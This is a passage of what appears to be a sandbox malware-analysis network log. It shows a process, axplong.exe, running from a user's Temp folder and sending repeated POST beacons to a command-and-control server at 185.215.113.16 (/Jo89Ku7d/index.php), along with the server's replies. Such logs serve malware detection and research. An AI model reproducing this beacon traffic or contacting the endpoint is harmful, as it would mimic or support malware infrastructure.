Sep 27, 2024 19:05:16.686966896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:16.718168020 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:16.942694902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	62771	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:17.070034027 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:17.791604996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:17.792372942 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:18.222332001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	62772	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:18.343193054 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:19.042541027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:19.043361902 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:19.267927885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	62773	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:19.376429081 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:20.093755007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:20.102241039 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:20.335776091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	62774	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:20.452722073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:21.143999100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:21.147187948 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:21.376091003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	62775	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:21.483911037 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:22.193558931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:22.194367886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:22.421060085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	62776	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:22.531008005 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:23.255934954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:23.256836891 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:23.485796928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	62777	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:23.593913078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:24.396785975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:24.397521973 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:24.621591091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	62778	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:24.734201908 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:25.629631996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:25.630772114 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:25.865909100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:26.091207027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	62779	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:26.203278065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:26.896487951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:26.897238016 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:27.120228052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	62780	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:27.236238956 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:27.977377892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:27.991801977 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:28.227736950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	62781	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:28.344547987 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:29.044981956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:29.089663029 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:29.317178011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	62782	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:29.593097925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:30.302067041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
